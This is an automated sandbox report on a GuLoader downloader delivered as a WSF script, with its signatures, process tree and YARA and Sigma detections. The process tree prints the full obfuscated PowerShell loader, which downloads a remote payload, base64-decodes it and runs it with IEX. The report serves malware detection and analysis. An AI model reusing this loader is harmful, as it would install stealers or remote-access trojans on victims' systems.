Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Prosba o oferte.wsf

Overview

General Information

Sample name:Prosba o oferte.wsf
Analysis ID:1528867
MD5:28ce58ca6b41786b0bd031af45f91d89
SHA1:7b72d8d9995bc61daf0074e967945ac6ed02a093
SHA256:43f28bfd339504ab45e4a3f52f8172036e196ef40e03ffcf6d5626f87a93f0e1
Tags:wsfuser-Maciej8910871
Infos:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Suspicious execution chain found
Suspicious powershell command line found
Uses ping.exe to check the status of other devices and networks
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Scan Loop Network
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 7312 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Prosba o oferte.wsf" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 7340 cmdline: cmd.exe /c ping 6777.6777.6777.677e MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PING.EXE (PID: 7392 cmdline: ping 6777.6777.6777.677e MD5: 2F46799D79D22AC72C241EC0322B011D)
    • powershell.exe (PID: 7468 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#nettenes Semipopular overstates Photodrome #>;$Lighedsideologis='Omrrer';<#Arbejdsbevgelser Allodialist Amanist Lydkilden Bortvejrede Peristole #>;$Occipitobregmatic=$Recrate149+$host.'PrivateData';If ($Occipitobregmatic) {$Rykkendes++;}function Ridsning89($Kabine){$Tardy=$Gehejmeraaden+$Kabine.Length-$Rykkendes; for( $Antilogarithmic=7;$Antilogarithmic -lt $Tardy;$Antilogarithmic+=8){$Achim='Filterbredders';$Molition+=$Kabine[$Antilogarithmic];$Facetter='Krigserklringer';}$Molition;}function Ruttendes80($Driftsregnskabet){ & ($Ansgningsfristen151) ($Driftsregnskabet);}$Nondiffusible=Ridsning89 'M.urernM Hem,meoAlfaderzHexin,niTingsvil Platonlsk ddera V nero/Dublan 5 Dumpek.Fisende0 Van.it Ostrace( Penc lW Sever,i Sym olnSkoles.dNonubiqoMissilswH,dderrsListles Semi acNlivegenT ,istol Mngder 1Habitus0strandf.Pronoun0 Unloqu;Wh tero RundsaWOpprioriEroderinNjesb,g6Maatter4Gerning;Rekrter VillaexGydning6Rensni,4Barrica;Undisc Foggi r luorev Noelge: Ytri.g1Humors 2Underho1Chrysa .Knivsme0Triker,) kademi postedGSelvbyge jergarcIndtagekSh ndyioUn easi/Per ore2airchec0Konform1Subtrak0Afvegne0Coloniz1 Is,ide0Moviepk1 Bovrup SkrudsaFUngoadeiDyslysirKonstrueF rekomfSteto koHydr baxOrkidxj/ So,ial1Turbomo2Banc,dr1 Doozie. E ilog0Polyaem ';$enere=Ridsning89 'BoningeUSmmomets Forthce ReinfurCirc mv-.oninteaGlairiegTitt pye Duss sNLinuxwit emul e ';$oversaettelser=Ridsning89 ' Temp lhTilendetFagretltjuleferpSuissef: andomr/ nthrac/ AvidlysBaldakiiPodargilFiletfai FlaxwonFerskvaalycop rsIndes.rt akettr.OdisblarKatedero Anfgte/CausticKSuboperoOverfrimElf nbemUnd.rstu unmaknToneskiiDementek Loc,moutransmut AfgoereTillg brR turnenPregalve FagidisDisarti.Rettetai DebetsnBarneskf Hj,rpe ';$Rustrdes=Ridsning89 'Snrkled>Kol nna ';$Ansgningsfristen151=Ridsning89 'AdmittaIGtesengEB talinXShownce ';$Lifefully169='forvrredes';$Fagbog='\Selvsikkerhedens.Pan';Ruttendes80 (Ridsning89 'Rygskca$KonomiigBughindLSpoonfuoAf ekslbInduk,iATehtterL Un ors:Uskad la Kont ar Mora deTjen.reN CompriIPo eredG Una so=Strappa$StttekrELampetcNTrenchaV Af.ejs:UdringeaImmunogpRullersPGa enesdStraffoAOp egniTFuracioACloques+Tredve.$Rec iliFOverskgaBogach gSwaverpBSexsymbOOrgueslGNazdrow ');Ruttendes80 (Ridsning89 'Satinsk$Po encegCol,barlSecretiO UltrasbRampageAFumlendL Ompo t:Solariur Vel,ilePaaklisMSidstemiForblfnsHeteroteQuadruprStandarNbroderiEXiphipl=Unpatri$CuttlefoZ.braerv ppositE N gaciRbnk bids Dwe.leAHolbaekeSo,brreTOralizeTPlia.tnEOmvurd l SysselsBrintboEHym.ariRforsker..almoniS Monu,epN.tlistLMycof oIsubricttBajadse(formule$Bra.skoremotiviuKowbirdsisnenneT torherROverid.dFrowsilED.ctyopSstre.kd) Maskab ');Ruttendes80 (Ridsning89 ',rindeh[ TrypaonT rolsueFiligratM,ltino.BeratedsvgaviseeKadrernr arneruVArtesynIPreexpec iretogeOpodidyPTriang,OSkattemiHankytoNAfvarsltFissio.muigenneAOverflyNOutrowsa FortriGOffertoEEksponer housli]Distill:Vaadesk:DagbrknS rchiepEDampskic roniseuSidereaRPineryaIVrist utr publiyAppre,up D.emakRJaguaroOHestehatGenerelODoggylacBlou,ieOStrubehlU unsti Recreme=Middelh Iglerne[CheviotnMesologeberapnitSu dogc.Syr,pliS eleddeeSelvsikc Unex,rudownpourGeswarpIWorktimtPulic dyNonrecip,aandopR Limed,O ,bessiTCirkeleOP.oduktCPudsekaODromiciLForfristStencilY colossPButterpEUndercr]Salmary:Isa,xet:UnsuccuTKonditeLRishiseSDeplace1ma tful2 ridine ');$oversaettelser=$remiserne[0];$Polymorphosis=(Ridsning89 'Bar alo$Steens.G EpilogL CheckmOschellaBMiljan AAn sogel Dur ps:TelefonOAdvokatcOriginiCE,genesaAptianaSSamhrig= FelthrNSpleni eLinie,ewBehfter-JagtregoTantal b StrengJBara keEslidstrCComma,pTSu.rhom estoves AntimeY SaloonsDefilertAnt,chaeDobbeltMAfgifts. An.misnAfmaalieSkovsneTPa.fyld.Matten WQuotedrEdi tionBAdminisc acteriLMeltablIKarpetvePremonsN uperiotIon xal ');Ruttendes80 ($Polymorphosis);Ruttendes80 (Ridsning89 ' Sjleg.$UrinemiO SalgspcPoternec teniniagrovelisRedunda.Polic.hHRandruseo ationaKova endBreathfeSomret r bygg,lsvidende[Sikkerh$udse deeWarti en PhasmaeLngdespr Non ere yetstr]dolmere=Afsonin$SeriefrN TemanuoSj krinnmodta edSorbedsi ActionfCommutefho rorouNi kroksIntestaiAleiptebSporvoglPaladineKarakte ');$Jobskabelsesordninger=Ridsning89 ' Thalam$UnameliOTekstmncBedrevncCrochetaLibatins Bleph .FlertalDHelvedeoFiredrawTumulosnAlkars l ForeigofilicinaForstasd CrimelFcostoc,iMickla lPara heeAlmi de(Isogen $UnderekoAllerstv RelubreStopklor KeelmasStone raSpidsbueGran patQua,rint Nat raelaceratlRegenersH nfreleSko emorProc am,Embed.m$P anineSDafniercSnuses oPandekat,ipakvatAffjed i N vnef) Bu ble ';$Scotti=$Arenig;Ruttendes80 (Ridsning89 'Bedst v$ GrundvgPunkerwlv lutaro PharynbResolveAHighfalLPrecom.:GoaleeaMAdlayflECharrosSHelmi,tO Ra.bitCStabensaTilbehrr RedimeD Gethesi O formUtchaderMSepiaer= Ast ol(AstrochtSjuskemeTommeskSFronts,tInertia-DruggerpSmaakraA PentasTPseudochembedsf Pingpon$kuldsejsRegalebCKolportOTordenkTPopularTNebengei Vergeh),predtl ');while (!$Mesocardium) {Ruttendes80 (Ridsning89 'Cambric$GalantegU roduklIulid no MorakkbSkjaldeaBugginglTrochle:PirnedkC Corr.laPrelimilcontekev FilmfeaElektrodSheenieoSammenssUnsoci eEmbedmer Arbejd=Tro aer$BlypeistStribedrdepreciu AntiloeBirdymu ') ;Ruttendes80 $Jobskabelsesordninger;Ruttendes80 (Ridsning89 ' ProcessNrsy etTTran meA Mo regr almiakTNeu,osu-Pa apsysUorga iLVom srueIn.ylice TenorsPCracksk Ebionit4 Py tru ');Ruttendes80 (Ridsning89 ' anhan$ressourgHovedvelDemogoroFamilieBMohammeAS.yringlKonkurs:TarmacmMHyperpiEObloquiS SolsikoFugtig cTornensaReloaneRContribDPo tanviDemograuQueniteMIndilat=rdskres(Tungekat.hanneleLunelseSEchino,tunm sse-StreungP,reddesA Sol tiTGatfinnHescapes Rsonnre$ netkorsTjanserCmisa.phOKasikumTUntuneatMiljoe iImp.ctf)Tiltruk ') ;Ruttendes80 (Ridsning89 'Faareky$ Span ggKom.eteL GrevinoUnder tBM sterkAHexactdLBasunki:Svale,rrProat eSPseudomt synk.o=Vrngend$HypothegCelado LG ecingOGrovderb Fr.gtfAPandoorlArbej.s:S ejlmohCurliewO EnolizvVankelmE Sa dviDRegulatsMeritleTreadornDAcetateE.rmorinRAppr xinLangtfreVoldgif+ Theopn+Bl,nder%B erska$Hjer,evrPopsieseBr sekam Emi,teI aldernsTio ontEkagedejRC.tronsnIntertreAmbitio. remkalCTopiadeoNdlsninURevengenKraitsgtPhoma e ') ;$oversaettelser=$remiserne[$Rst];}$Tttedes=326639;$saltene=34997;Ruttendes80 (Ridsning89 ' Readab$ mediefGSkonn.rLOmvurdeOVejrforbSoudanoaIscenesLSmu dre:Addit rgPeripr aT yrocoLArchpriGHomoaniaBuggysblRhi oth2Udvande1Doltish2Danaide Argesta= uanaju BoligakGMingledePecksbrTForthca- agstagCDirektoo HurtignInnobedTKrig skEBeneficnAdopt.vTAgrosto Grssers$MorfinrsstatsobcFrem igoDronte T,anonesT SkydeliAfkogen ');Ruttendes80 (Ridsning89 'oejentr$Til.varg EnhalolLangesso S oldibPedun uaDdse,stlPinlige:BlddeleSAdopt,vkPre ispr AnglicmMnemotekCr zadooI,putterGanespat Dollfie So emitH potrasDertilh Pre.ect=Gudfryg Nyans t[PanorerS,ildoesy diculesS lstictStatio eHomeoidmNyttepl.Hov.dmnCStepninoOrganisnKrrers,vUrbicole GlandurDynamogtUmuligg]venc.es: Apo.op:Stu.gerFBrode irNonk nfo,rosciemRescuerBAmati oa aveates Immunoe Grever6Appeten4UndergiSBldtes.t ungramrma tynii Omkar.nBydren gIndsben(grazess$SygejouGDisacc aAfhngiglFolkebigBen alsaKartof lGardebr2Vilif e1Pseudob2Ratifik) Unretr ');Ruttendes80 (Ridsning89 'Sk ated$Musophag Fu ktiLF itageoUnshameb SyllabaPre bytLKlangen:preoccupVinduesR.oodleaOTantaluJRefereneK,stterk ArchemTsupermomMarlberAKaramboGBumbasseBusmanfrSideganE Hypo iN.lhoppe Sharif=Olmintr Cateri [LaanernSS.ingomYA ticapsHolosyst Civil EW enersMNaphtha.Coked fTDis.quiE Temp,rxSymptomT Demihe.Phello ECymosebn EmulsiCUdvikliOLethargDProvan ICo.loqunBi.liotG Frilag]Overmod: Ov.rho:TrstespANo icess B.ggemCRudime,iDiauli,i Arbejd.ConnectgbibliogeSwitcheT CephalstrykknaTT levierS gganpI BebyrdnTrsterngSugem,k( Thia e$Stra leSScheelikGravsknR drulnmDobbeltkOenomanoTumu.usR Som.dato dkritE PengestP.raconsordstrr)Garring ');Ruttendes80 (Ridsning89 'Kultu.e$SovjetrGFlys.yrlChauvinOO.ertrdbSludderA HanderLRoadrun: For ulf CamelkURn eboenC.maenvN KakerleChemehuLudsvednFScru.uloOpsttecRFemma tML gerva= Bystat$ ndiscpS,ruktuRDataselOVibrahaJHyperdoE GyritsK Bagkl tTrk uglMBan eorA ThemedgH spitaeG ksporRFremtidEMajonseNDomsafs.demetonS Ded.cnU Peake bKons rusun.erviTKaritt R illedIBage,psNprecisigVirksom(Skaberi$AfstrafTUrb nisTAdanfejTConominEScar dldPalu amE Un bsts trafi , Michel$UdstansS elotaAPrgt gel DolomitEjeresuE Eftergn HalvtieNonreti)Udbring ');Ruttendes80 $Funnelform;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 7936 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#nettenes Semipopular overstates Photodrome #>;$Lighedsideologis='Omrrer';<#Arbejdsbevgelser Allodialist Amanist Lydkilden Bortvejrede Peristole #>;$Occipitobregmatic=$Recrate149+$host.'PrivateData';If ($Occipitobregmatic) {$Rykkendes++;}function Ridsning89($Kabine){$Tardy=$Gehejmeraaden+$Kabine.Length-$Rykkendes; for( $Antilogarithmic=7;$Antilogarithmic -lt $Tardy;$Antilogarithmic+=8){$Achim='Filterbredders';$Molition+=$Kabine[$Antilogarithmic];$Facetter='Krigserklringer';}$Molition;}function Ruttendes80($Driftsregnskabet){ & ($Ansgningsfristen151) ($Driftsregnskabet);}$Nondiffusible=Ridsning89 'M.urernM Hem,meoAlfaderzHexin,niTingsvil Platonlsk ddera V nero/Dublan 5 Dumpek.Fisende0 Van.it Ostrace( Penc lW Sever,i Sym olnSkoles.dNonubiqoMissilswH,dderrsListles Semi acNlivegenT ,istol Mngder 1Habitus0strandf.Pronoun0 Unloqu;Wh tero RundsaWOpprioriEroderinNjesb,g6Maatter4Gerning;Rekrter VillaexGydning6Rensni,4Barrica;Undisc Foggi r luorev Noelge: Ytri.g1Humors 2Underho1Chrysa .Knivsme0Triker,) kademi postedGSelvbyge jergarcIndtagekSh ndyioUn easi/Per ore2airchec0Konform1Subtrak0Afvegne0Coloniz1 Is,ide0Moviepk1 Bovrup SkrudsaFUngoadeiDyslysirKonstrueF rekomfSteto koHydr baxOrkidxj/ So,ial1Turbomo2Banc,dr1 Doozie. E ilog0Polyaem ';$enere=Ridsning89 'BoningeUSmmomets Forthce ReinfurCirc mv-.oninteaGlairiegTitt pye Duss sNLinuxwit emul e ';$oversaettelser=Ridsning89 ' Temp lhTilendetFagretltjuleferpSuissef: andomr/ nthrac/ AvidlysBaldakiiPodargilFiletfai FlaxwonFerskvaalycop rsIndes.rt akettr.OdisblarKatedero Anfgte/CausticKSuboperoOverfrimElf nbemUnd.rstu unmaknToneskiiDementek Loc,moutransmut AfgoereTillg brR turnenPregalve FagidisDisarti.Rettetai DebetsnBarneskf Hj,rpe ';$Rustrdes=Ridsning89 'Snrkled>Kol nna ';$Ansgningsfristen151=Ridsning89 'AdmittaIGtesengEB talinXShownce ';$Lifefully169='forvrredes';$Fagbog='\Selvsikkerhedens.Pan';Ruttendes80 (Ridsning89 'Rygskca$KonomiigBughindLSpoonfuoAf ekslbInduk,iATehtterL Un ors:Uskad la Kont ar Mora deTjen.reN CompriIPo eredG Una so=Strappa$StttekrELampetcNTrenchaV Af.ejs:UdringeaImmunogpRullersPGa enesdStraffoAOp egniTFuracioACloques+Tredve.$Rec iliFOverskgaBogach gSwaverpBSexsymbOOrgueslGNazdrow ');Ruttendes80 (Ridsning89 'Satinsk$Po encegCol,barlSecretiO UltrasbRampageAFumlendL Ompo t:Solariur Vel,ilePaaklisMSidstemiForblfnsHeteroteQuadruprStandarNbroderiEXiphipl=Unpatri$CuttlefoZ.braerv ppositE N gaciRbnk bids Dwe.leAHolbaekeSo,brreTOralizeTPlia.tnEOmvurd l SysselsBrintboEHym.ariRforsker..almoniS Monu,epN.tlistLMycof oIsubricttBajadse(formule$Bra.skoremotiviuKowbirdsisnenneT torherROverid.dFrowsilED.ctyopSstre.kd) Maskab ');Ruttendes80 (Ridsning89 ',rindeh[ TrypaonT rolsueFiligratM,ltino.BeratedsvgaviseeKadrernr arneruVArtesynIPreexpec iretogeOpodidyPTriang,OSkattemiHankytoNAfvarsltFissio.muigenneAOverflyNOutrowsa FortriGOffertoEEksponer housli]Distill:Vaadesk:DagbrknS rchiepEDampskic roniseuSidereaRPineryaIVrist utr publiyAppre,up D.emakRJaguaroOHestehatGenerelODoggylacBlou,ieOStrubehlU unsti Recreme=Middelh Iglerne[CheviotnMesologeberapnitSu dogc.Syr,pliS eleddeeSelvsikc Unex,rudownpourGeswarpIWorktimtPulic dyNonrecip,aandopR Limed,O ,bessiTCirkeleOP.oduktCPudsekaODromiciLForfristStencilY colossPButterpEUndercr]Salmary:Isa,xet:UnsuccuTKonditeLRishiseSDeplace1ma tful2 ridine ');$oversaettelser=$remiserne[0];$Polymorphosis=(Ridsning89 'Bar alo$Steens.G EpilogL CheckmOschellaBMiljan AAn sogel Dur ps:TelefonOAdvokatcOriginiCE,genesaAptianaSSamhrig= FelthrNSpleni eLinie,ewBehfter-JagtregoTantal b StrengJBara keEslidstrCComma,pTSu.rhom estoves AntimeY SaloonsDefilertAnt,chaeDobbeltMAfgifts. An.misnAfmaalieSkovsneTPa.fyld.Matten WQuotedrEdi tionBAdminisc acteriLMeltablIKarpetvePremonsN uperiotIon xal ');Ruttendes80 ($Polymorphosis);Ruttendes80 (Ridsning89 ' Sjleg.$UrinemiO SalgspcPoternec teniniagrovelisRedunda.Polic.hHRandruseo ationaKova endBreathfeSomret r bygg,lsvidende[Sikkerh$udse deeWarti en PhasmaeLngdespr Non ere yetstr]dolmere=Afsonin$SeriefrN TemanuoSj krinnmodta edSorbedsi ActionfCommutefho rorouNi kroksIntestaiAleiptebSporvoglPaladineKarakte ');$Jobskabelsesordninger=Ridsning89 ' Thalam$UnameliOTekstmncBedrevncCrochetaLibatins Bleph .FlertalDHelvedeoFiredrawTumulosnAlkars l ForeigofilicinaForstasd CrimelFcostoc,iMickla lPara heeAlmi de(Isogen $UnderekoAllerstv RelubreStopklor KeelmasStone raSpidsbueGran patQua,rint Nat raelaceratlRegenersH nfreleSko emorProc am,Embed.m$P anineSDafniercSnuses oPandekat,ipakvatAffjed i N vnef) Bu ble ';$Scotti=$Arenig;Ruttendes80 (Ridsning89 'Bedst v$ GrundvgPunkerwlv lutaro PharynbResolveAHighfalLPrecom.:GoaleeaMAdlayflECharrosSHelmi,tO Ra.bitCStabensaTilbehrr RedimeD Gethesi O formUtchaderMSepiaer= Ast ol(AstrochtSjuskemeTommeskSFronts,tInertia-DruggerpSmaakraA PentasTPseudochembedsf Pingpon$kuldsejsRegalebCKolportOTordenkTPopularTNebengei Vergeh),predtl ');while (!$Mesocardium) {Ruttendes80 (Ridsning89 'Cambric$GalantegU roduklIulid no MorakkbSkjaldeaBugginglTrochle:PirnedkC Corr.laPrelimilcontekev FilmfeaElektrodSheenieoSammenssUnsoci eEmbedmer Arbejd=Tro aer$BlypeistStribedrdepreciu AntiloeBirdymu ') ;Ruttendes80 $Jobskabelsesordninger;Ruttendes80 (Ridsning89 ' ProcessNrsy etTTran meA Mo regr almiakTNeu,osu-Pa apsysUorga iLVom srueIn.ylice TenorsPCracksk Ebionit4 Py tru ');Ruttendes80 (Ridsning89 ' anhan$ressourgHovedvelDemogoroFamilieBMohammeAS.yringlKonkurs:TarmacmMHyperpiEObloquiS SolsikoFugtig cTornensaReloaneRContribDPo tanviDemograuQueniteMIndilat=rdskres(Tungekat.hanneleLunelseSEchino,tunm sse-StreungP,reddesA Sol tiTGatfinnHescapes Rsonnre$ netkorsTjanserCmisa.phOKasikumTUntuneatMiljoe iImp.ctf)Tiltruk ') ;Ruttendes80 (Ridsning89 'Faareky$ Span ggKom.eteL GrevinoUnder tBM sterkAHexactdLBasunki:Svale,rrProat eSPseudomt synk.o=Vrngend$HypothegCelado LG ecingOGrovderb Fr.gtfAPandoorlArbej.s:S ejlmohCurliewO EnolizvVankelmE Sa dviDRegulatsMeritleTreadornDAcetateE.rmorinRAppr xinLangtfreVoldgif+ Theopn+Bl,nder%B erska$Hjer,evrPopsieseBr sekam Emi,teI aldernsTio ontEkagedejRC.tronsnIntertreAmbitio. remkalCTopiadeoNdlsninURevengenKraitsgtPhoma e ') ;$oversaettelser=$remiserne[$Rst];}$Tttedes=326639;$saltene=34997;Ruttendes80 (Ridsning89 ' Readab$ mediefGSkonn.rLOmvurdeOVejrforbSoudanoaIscenesLSmu dre:Addit rgPeripr aT yrocoLArchpriGHomoaniaBuggysblRhi oth2Udvande1Doltish2Danaide Argesta= uanaju BoligakGMingledePecksbrTForthca- agstagCDirektoo HurtignInnobedTKrig skEBeneficnAdopt.vTAgrosto Grssers$MorfinrsstatsobcFrem igoDronte T,anonesT SkydeliAfkogen ');Ruttendes80 (Ridsning89 'oejentr$Til.varg EnhalolLangesso S oldibPedun uaDdse,stlPinlige:BlddeleSAdopt,vkPre ispr AnglicmMnemotekCr zadooI,putterGanespat Dollfie So emitH potrasDertilh Pre.ect=Gudfryg Nyans t[PanorerS,ildoesy diculesS lstictStatio eHomeoidmNyttepl.Hov.dmnCStepninoOrganisnKrrers,vUrbicole GlandurDynamogtUmuligg]venc.es: Apo.op:Stu.gerFBrode irNonk nfo,rosciemRescuerBAmati oa aveates Immunoe Grever6Appeten4UndergiSBldtes.t ungramrma tynii Omkar.nBydren gIndsben(grazess$SygejouGDisacc aAfhngiglFolkebigBen alsaKartof lGardebr2Vilif e1Pseudob2Ratifik) Unretr ');Ruttendes80 (Ridsning89 'Sk ated$Musophag Fu ktiLF itageoUnshameb SyllabaPre bytLKlangen:preoccupVinduesR.oodleaOTantaluJRefereneK,stterk ArchemTsupermomMarlberAKaramboGBumbasseBusmanfrSideganE Hypo iN.lhoppe Sharif=Olmintr Cateri [LaanernSS.ingomYA ticapsHolosyst Civil EW enersMNaphtha.Coked fTDis.quiE Temp,rxSymptomT Demihe.Phello ECymosebn EmulsiCUdvikliOLethargDProvan ICo.loqunBi.liotG Frilag]Overmod: Ov.rho:TrstespANo icess B.ggemCRudime,iDiauli,i Arbejd.ConnectgbibliogeSwitcheT CephalstrykknaTT levierS gganpI BebyrdnTrsterngSugem,k( Thia e$Stra leSScheelikGravsknR drulnmDobbeltkOenomanoTumu.usR Som.dato dkritE PengestP.raconsordstrr)Garring ');Ruttendes80 (Ridsning89 'Kultu.e$SovjetrGFlys.yrlChauvinOO.ertrdbSludderA HanderLRoadrun: For ulf CamelkURn eboenC.maenvN KakerleChemehuLudsvednFScru.uloOpsttecRFemma tML gerva= Bystat$ ndiscpS,ruktuRDataselOVibrahaJHyperdoE GyritsK Bagkl tTrk uglMBan eorA ThemedgH spitaeG ksporRFremtidEMajonseNDomsafs.demetonS Ded.cnU Peake bKons rusun.erviTKaritt R illedIBage,psNprecisigVirksom(Skaberi$AfstrafTUrb nisTAdanfejTConominEScar dldPalu amE Un bsts trafi , Michel$UdstansS elotaAPrgt gel DolomitEjeresuE Eftergn HalvtieNonreti)Udbring ');Ruttendes80 $Funnelform;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 7944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000002.4239463001.0000000008370000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
    00000009.00000002.4239592864.00000000095B5000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      00000009.00000002.4228266092.00000000055C6000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
        00000004.00000002.2131900489.000002CC94CF3000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
          Process Memory Space: powershell.exe PID: 7468JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Click to see the 3 entries

            Other

            SourceRuleDescriptionAuthorStrings
            amsi64_7468.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
              amsi64_7468.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
              • 0x10541:$b2: ::FromBase64String(
              • 0xd8f4:$s1: -join
              • 0x70a0:$s4: +=
              • 0x7162:$s4: +=
              • 0xb389:$s4: +=
              • 0xd4a6:$s4: +=
              • 0xd790:$s4: +=
              • 0xd8d6:$s4: +=
              • 0xfc5f:$s4: +=
              • 0xfcdf:$s4: +=
              • 0xfda5:$s4: +=
              • 0xfe25:$s4: +=
              • 0xfffb:$s4: +=
              • 0x1007f:$s4: +=
              • 0xe100:$e4: Get-WmiObject
              • 0xe2ef:$e4: Get-Process
              • 0xe347:$e4: Start-Process
              amsi32_7936.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
              • 0xb0ee:$b2: ::FromBase64String(
              • 0xa18c:$s1: -join
              • 0x3938:$s4: +=
              • 0x39fa:$s4: +=
              • 0x7c21:$s4: +=
              • 0x9d3e:$s4: +=
              • 0xa028:$s4: +=
              • 0xa16e:$s4: +=
              • 0x15359:$s4: +=
              • 0x153d9:$s4: +=
              • 0x1549f:$s4: +=
              • 0x1551f:$s4: +=
              • 0x156f5:$s4: +=
              • 0x15779:$s4: +=
              • 0xa998:$e4: Get-WmiObject
              • 0xab87:$e4: Get-Process
              • 0xabdf:$e4: Start-Process
              • 0x1600a:$e4: Get-Process

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Suspicious Scan Loop Network
              Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#nettenes Semipopular overstates Photodrome #>;$Lighedsideologis='Omrrer';<#Arbejdsbevgelser Allodialist Amanist Lydkilden Bortvejrede Peristole #>;$Occipitobregmatic=$Recrate149+$host.'PrivateData';If ($Occipitobregmatic) {$Rykkendes++;}function Ridsning89($Kabine){$Tardy=$Gehejmeraaden+$Kabine.Length-$Rykkendes; for( $Antilogarithmic=7;$Antilogarithmic -lt $Tardy;$Antilogarithmic+=8){$Achim='Filterbredders';$Molition+=$Kabine[$Antilogarithmic];$Facetter='Krigserklringer';}$Molition;}function Ruttendes80($Driftsregnskabet){ & ($Ansgningsfristen151) ($Driftsregnskabet);}$Nondiffusible=Ridsning89 'M.urernM Hem,meoAlfaderzHexin,niTingsvil Platonlsk ddera V nero/Dublan 5 Dumpek.Fisende0 Van.it Ostrace( Penc lW Sever,i Sym olnSkoles.dNonubiqoMissilswH,dderrsListles Semi acNlivegenT ,istol Mngder 1Habitus0strandf.Pronoun0 Unloqu;Wh tero RundsaWOpprioriEroderinNjesb,g6Maatter4Gerning;Rekrter VillaexGydning6Rensni,4Barrica;Undisc Foggi r luorev Noelge: Ytri.g1Humors 2Underho1Chrysa .Knivsme0Triker,) kademi postedGSelvbyge jergarcIndtagekSh ndyioUn easi/Per ore2airchec0Konform1Subtrak0Afvegne0Coloniz1 Is,ide0Moviepk1 Bovrup SkrudsaFUngoadeiDyslysirKonstrueF rekomfSteto koHydr baxOrkidxj/ So,ial1Turbomo2Banc,dr1 Doozie. E ilog0Polyaem ';$enere=Ridsning89 'BoningeUSmmomets Forthce ReinfurCirc mv-.oninteaGlairiegTitt pye Duss sNLinuxwit emul e ';$oversaettelser=Ridsning89 ' Temp lhTilendetFagretltjuleferpSuissef: andomr/ nthrac/ AvidlysBaldakiiPodargilFiletfai FlaxwonFerskvaalycop rsIndes.rt akettr.OdisblarKatedero Anfgte/CausticKSuboperoOverfrimElf nbemUnd.rstu unmaknToneskiiDementek Loc,moutransmut AfgoereTillg brR turnenPregalve FagidisDisarti.Rettetai DebetsnBarneskf Hj,rpe ';$Rustrdes=Ridsning89 'Snrkled>Kol nna ';$Ansgningsfristen151=Ridsning89 'AdmittaIGtesengEB talinXShownce ';$Lifefully169='forvrredes';$Fagbog='\Selvsikkerhedens.Pan';Ruttendes80 (Ridsning89 'Rygskca$KonomiigBughindLSpoonfuoAf ekslbInduk,iATehtterL Un ors:Uskad la Kont ar Mora deTjen.reN CompriIPo eredG Una so=Strappa$StttekrELampetcNTrenchaV Af.ejs:UdringeaImmunogpRullersPGa enesdStraffoAOp egniTFuracioACloques+Tredve.$Rec iliFOverskgaBogach gSwaverpBSexsymbOOrgueslGNazdrow ');Ruttendes80 (Ridsning89 'Satinsk$Po encegCol,barlSecretiO UltrasbRampageAFumlendL Ompo t:Solariur 